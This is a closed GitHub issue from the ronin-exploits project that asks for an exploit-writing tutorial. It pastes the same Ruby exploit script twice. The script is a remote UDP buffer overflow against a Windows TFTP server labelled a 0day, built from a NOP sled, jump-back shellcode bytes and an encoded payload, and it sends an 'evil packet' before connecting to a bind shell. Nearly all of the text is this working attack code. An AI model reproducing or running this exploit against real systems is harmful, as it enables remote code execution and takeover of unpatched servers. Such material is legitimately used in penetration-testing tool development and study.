Closed postmodern closed 1 year ago
Add a tutorial detailing how to write exploits using ronin-exploits.
#!/usr/bin/ronin-exploit -f require 'ronin/exploit/remote_udp' Ronin::Exploits::RemoteUDP.object do cache do self.description = "TFTP Server for Windows V1.4 ST (0day)" self.url = "http://www.offensive-security.com" end parameter :host, :default => '172.16.167.134' parameter :port, :default => 69 build do # Jump back shellcode sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c" sc += "\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b" sc += "\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30" filename = ("\x90" * 860) + @encoded_payload + ("\x90" * 14) + "#{sc}\xeb\xd0\x90\x90\x2b\x0e\x41" mode = "netascii" @exploit = "\x00\x02" + filename + "\0" + mode + "\0" end deploy do print_info "Sending evil packet, ph33r" udp_send @exploit print_info "Connecting to bind shell" end end
Superseded by issue #30.
postmodern
commented
1 year ago postmodern
commented
1 year ago
Add a tutorial detailing how to write exploits using ronin-exploits.
#!/usr/bin/ronin-exploit -f require 'ronin/exploit/remote_udp' Ronin::Exploits::RemoteUDP.object do cache do self.description = "TFTP Server for Windows V1.4 ST (0day)" self.url = "http://www.offensive-security.com" end parameter :host, :default => '172.16.167.134' parameter :port, :default => 69 build do # Jump back shellcode sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c" sc += "\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b" sc += "\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30" filename = ("\x90" * 860) + @encoded_payload + ("\x90" * 14) + "#{sc}\xeb\xd0\x90\x90\x2b\x0e\x41" mode = "netascii" @exploit = "\x00\x02" + filename + "\0" + mode + "\0" end deploy do print_info "Sending evil packet, ph33r" udp_send @exploit print_info "Connecting to bind shell" end end